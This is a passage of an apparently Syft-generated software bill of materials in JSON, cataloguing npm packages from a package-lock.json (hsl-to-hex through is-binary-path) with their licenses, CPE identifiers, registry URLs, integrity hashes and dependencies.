age-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:hsl-to-hex:hsl-to-hex:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl-to-hex:hsl_to_hex:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl_to_hex:hsl-to-hex:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl_to_hex:hsl_to_hex:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl-to:hsl-to-hex:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl-to:hsl_to_hex:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl_to:hsl-to-hex:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl_to:hsl_to_hex:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl:hsl-to-hex:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl:hsl_to_hex:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/hsl-to-hex@1.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/hsl-to-hex/-/hsl-to-hex-1.0.0.tgz","integrity":"sha512-K6GVpucS5wFf44X0h2bLVRDsycgJmf9FF2elg+CrqD8GcFU8c6vYhgXn8NjUkFCwj+xDFb70qgLbTUm6sxwPmA==","dependencies":{"hsl-to-rgb-for-reals":"^1.1.0"}}},{"id":"52590567976abaf8","name":"hsl-to-rgb-for-reals","version":"1.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:hsl-to-rgb-for-reals:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl-to-rgb-for-reals:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl_to_rgb_for_reals:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl_to_rgb_for_reals:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl-to-rgb-for:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl-to-rgb-for:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl_to_rgb_for:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl_to_rgb_for:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl-to-rgb:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl-to-rgb:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl_to_rgb:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl_to_rgb:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl-to:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl-to:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl_to:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl_to:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:hsl:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/hsl-to-rgb-for-reals@1.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/hsl-to-rgb-for-reals/-/hsl-to-rgb-for-reals-1.1.1.tgz","integrity":"sha512-LgOWAkrN0rFaQpfdWBQlv/VhkOxb5AsBjk6NQVx4yEzWS923T07X0M1Y0VNko2H52HeSpZrZNNMJ0aFqsdVzQg==","dependencies":null}},{"id":"4d1e475b46ee4f29","name":"html-entities","version":"2.6.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:html-entities:html-entities:2.6.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:html-entities:html_entities:2.6.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:html_entities:html-entities:2.6.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:html_entities:html_entities:2.6.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:html:html-entities:2.6.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:html:html_entities:2.6.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/html-entities@2.6.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/html-entities/-/html-entities-2.6.0.tgz","integrity":"sha512-kig+rMn/QOVRvr7c86gQ8lWXq+Hkv6CbAH1hLu+RG338StTpE8Z0b44SDVaqVu7HGKf27frdmUYEs9hTUX/cLQ==","dependencies":null}},{"id":"41ee91a75a779a86","name":"html-to-text","version":"9.0.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:html-to-text:html-to-text:9.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:html-to-text:html_to_text:9.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:html_to_text:html-to-text:9.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:html_to_text:html_to_text:9.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:html-to:html-to-text:9.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:html-to:html_to_text:9.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:html_to:html-to-text:9.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:html_to:html_to_text:9.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:html:html-to-text:9.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:html:html_to_text:9.0.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/html-to-text@9.0.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/html-to-text/-/html-to-text-9.0.5.tgz","integrity":"sha512-qY60FjREgVZL03vJU6IfMV4GDjGBIoOyvuFdpBDIX9yTlDw0TjxVBQp+P8NvpdIXNJvfWBTNul7fsAQJq2FNpg==","dependencies":{"@selderee/plugin-htmlparser2":"^0.11.0","deepmerge":"^4.3.1","dom-serializer":"^2.0.0","htmlparser2":"^8.0.2","selderee":"^0.11.0"}}},{"id":"4a5b4c89e570771b","name":"htmlparser2","version":"8.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:htmlparser2:htmlparser2:8.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/htmlparser2@8.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/htmlparser2/-/htmlparser2-8.0.2.tgz","integrity":"sha512-GYdjWKDkbRLkZ5geuHs5NY1puJ+PXwP7+fHPRz06Eirsb9ugf6d8kkXav6ADhcODhFFPMIXyxkxSuMf3D6NCFA==","dependencies":{"domelementtype":"^2.3.0","domhandler":"^5.0.3","domutils":"^3.0.1","entities":"^4.4.0"}}},{"id":"bf2c5c4cccddf639","name":"http-errors","version":"2.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:http-errors:http-errors:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http-errors:http_errors:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http_errors:http-errors:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http_errors:http_errors:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http:http-errors:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http:http_errors:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/http-errors@2.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/http-errors/-/http-errors-2.0.1.tgz","integrity":"sha512-4FbRdAX+bSdmo4AUFuS0WNiPz8NgFt+r8ThgNWmlrjQjt1Q7ZR9+zTlce2859x4KSXrwIsaeTqDoKQmtP8pLmQ==","dependencies":{"depd":"~2.0.0","inherits":"~2.0.4","setprototypeof":"~1.2.0","statuses":"~2.0.2","toidentifier":"~1.0.1"}}},{"id":"b85e63dfe0c1efe8","name":"http-parser-js","version":"0.5.10","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:http-parser-js:http-parser-js:0.5.10:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http-parser-js:http_parser_js:0.5.10:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http_parser_js:http-parser-js:0.5.10:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http_parser_js:http_parser_js:0.5.10:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http-parser:http-parser-js:0.5.10:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http-parser:http_parser_js:0.5.10:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http_parser:http-parser-js:0.5.10:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http_parser:http_parser_js:0.5.10:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http:http-parser-js:0.5.10:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http:http_parser_js:0.5.10:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/http-parser-js@0.5.10","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/http-parser-js/-/http-parser-js-0.5.10.tgz","integrity":"sha512-Pysuw9XpUq5dVc/2SMHpuTY01RFl8fttgcyunjL7eEMhGM3cI4eOmiCycJDVCo/7O7ClfQD3SaI6ftDzqOXYMA==","dependencies":null}},{"id":"91bc09c317f85f97","name":"http-proxy-agent","version":"5.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:http-proxy-agent:http-proxy-agent:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http-proxy-agent:http_proxy_agent:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http_proxy_agent:http-proxy-agent:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http_proxy_agent:http_proxy_agent:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http-proxy:http-proxy-agent:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http-proxy:http_proxy_agent:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http_proxy:http-proxy-agent:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http_proxy:http_proxy_agent:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http:http-proxy-agent:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:http:http_proxy_agent:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/http-proxy-agent@5.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/http-proxy-agent/-/http-proxy-agent-5.0.0.tgz","integrity":"sha512-n2hY8YdoRE1i7r6M0w9DIw5GgZN0G25P8zLCRQ8rjXtTU3vsNFBI/vWK/UIeE6g5MUUz6avwAPXmL6Fy9D/90w==","dependencies":{"@tootallnate/once":"2","agent-base":"6","debug":"4"}}},{"id":"ac843d04db23cee1","name":"https-proxy-agent","version":"5.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:https-proxy-agent_project:https-proxy-agent:5.0.1:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/https-proxy-agent@5.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.1.tgz","integrity":"sha512-dFcAjpTQFgoLMzC2VwU+C/CbS7uRL0lWmxDITmqm7C+7F0Odmj6s9l6alZc6AELXhrnggM2CeWSXHGOdX2YtwA==","dependencies":{"agent-base":"6","debug":"4"}}},{"id":"2d10e944bb8687bf","name":"https-proxy-agent","version":"7.0.6","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:https-proxy-agent_project:https-proxy-agent:7.0.6:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/https-proxy-agent@7.0.6","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.6.tgz","integrity":"sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==","dependencies":{"agent-base":"^7.1.2","debug":"4"}}},{"id":"0cfa30ecdd760351","name":"hyphen","version":"1.14.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:hyphen:hyphen:1.14.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/hyphen@1.14.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/hyphen/-/hyphen-1.14.1.tgz","integrity":"sha512-kvL8xYl5QMTh+LwohVN72ciOxC0OEV79IPdJSTwEXok9y9QHebXGdFgrED4sWfiax/ODx++CAMk3hMy4XPJPOw==","dependencies":null}},{"id":"3ce09826a837d25b","name":"iconv-lite","version":"0.4.24","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:iconv-lite:iconv-lite:0.4.24:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:iconv-lite:iconv_lite:0.4.24:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:iconv_lite:iconv-lite:0.4.24:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:iconv_lite:iconv_lite:0.4.24:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:iconv:iconv-lite:0.4.24:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:iconv:iconv_lite:0.4.24:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/iconv-lite@0.4.24","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.4.24.tgz","integrity":"sha512-v3MXnZAcvnywkTUEZomIActle7RXXeedOR31wwl7VlyoXO4Qi9arvSenNQWne1TcRwhCL1HwLI21bEqdpj8/rA==","dependencies":{"safer-buffer":">= 2.1.2 < 3"}}},{"id":"911374ff7f37ba7f","name":"inherits","version":"2.0.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:inherits:inherits:2.0.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/inherits@2.0.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz","integrity":"sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==","dependencies":null}},{"id":"29aeb86d59c0f085","name":"ini","version":"1.3.8","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:ini_project:ini:1.3.8:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/ini@1.3.8","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/ini/-/ini-1.3.8.tgz","integrity":"sha512-JV/yugV2uzW5iMRSiZAyDtQd+nxtUnjeLt0acNdw98kKLrvuRVyB80tsREOE7yvGVgalhZ6RNXCmEHkUKBKxew==","dependencies":null}},{"id":"da7b570ddddf2064","name":"internmap","version":"2.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:internmap:internmap:2.0.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/internmap@2.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/internmap/-/internmap-2.0.3.tgz","integrity":"sha512-5Hh7Y1wQbvY5ooGgPbDaL5iYLAPzMTUrjMulskHLH6wnv/A+1q5rgEaiuqEjB+oxGXIVZs1FF+R/KPN3ZSQYYg==","dependencies":null}},{"id":"0c5e141c3ee662a0","name":"ioredis","version":"5.10.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:ioredis:ioredis:5.10.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/ioredis@5.10.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/ioredis/-/ioredis-5.10.1.tgz","integrity":"sha512-HuEDBTI70aYdx1v6U97SbNx9F1+svQKBDo30o0b9fw055LMepzpOOd0Ccg9Q6tbqmBSJaMuY0fB7yw9/vjBYCA==","dependencies":{"@ioredis/commands":"1.5.1","cluster-key-slot":"^1.1.0","debug":"^4.3.4","denque":"^2.1.0","lodash.defaults":"^4.2.0","lodash.isarguments":"^3.1.0","redis-errors":"^1.2.0","redis-parser":"^3.0.0","standard-as-callback":"^2.1.0"}}},{"id":"25abf70855373b85","name":"ip-address","version":"10.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:ip-address:ip-address:10.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ip-address:ip_address:10.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ip_address:ip-address:10.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ip_address:ip_address:10.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ip:ip-address:10.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ip:ip_address:10.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/ip-address@10.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/ip-address/-/ip-address-10.2.0.tgz","integrity":"sha512-/+S6j4E9AHvW9SWMSEY9Xfy66O5PWvVEJ08O0y5JGyEKQpojb0K0GKpz/v5HJ/G0vi3D2sjGK78119oXZeE0qA==","dependencies":null}},{"id":"c7a7f0ed243b0857","name":"ipaddr.js","version":"1.9.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:ipaddr.js:ipaddr.js:1.9.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/ipaddr.js@1.9.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/ipaddr.js/-/ipaddr.js-1.9.1.tgz","integrity":"sha512-0KI/607xoxSToH7GjN1FfSbLoU0+btTicjsQSWQlh/hZykN8KpmMf7uYwPW3R+akZ6R/w18ZlXSHBYXiYUPO3g==","dependencies":null}},{"id":"88ac3450fc3712b8","name":"is-arrayish","version":"0.3.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:is-arrayish:is-arrayish:0.3.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is-arrayish:is_arrayish:0.3.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_arrayish:is-arrayish:0.3.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_arrayish:is_arrayish:0.3.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is:is-arrayish:0.3.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is:is_arrayish:0.3.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/is-arrayish@0.3.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.3.4.tgz","integrity":"sha512-m6UrgzFVUYawGBh1dUsWR5M2Clqic9RVXC/9f8ceNlv2IcO9j9J/z8UoCLPqtsPBFNzEpfR3xftohbfqDx8EQA==","dependencies":null}},{"id":"12d3bfff6ef69b2c","name":"is-binary-path","version":"2.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:is-binary-path:is-binary-path:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is-binary-path:is_binary_path:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_binary_path:is-binary-path:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_binary_path:is_binary_path:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is-binary:is-binary-path:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is-binary:is_binary_path:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_binary:is-binary-path:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is_binary:is_binary_path:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is:is-binary-path:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:is:is_binary_path:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/is-binary-path@2.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/is-binary-path/-/is-binary-path-2.1.0.tgz","integrity":"sha512-ZMERYes6pDydyuG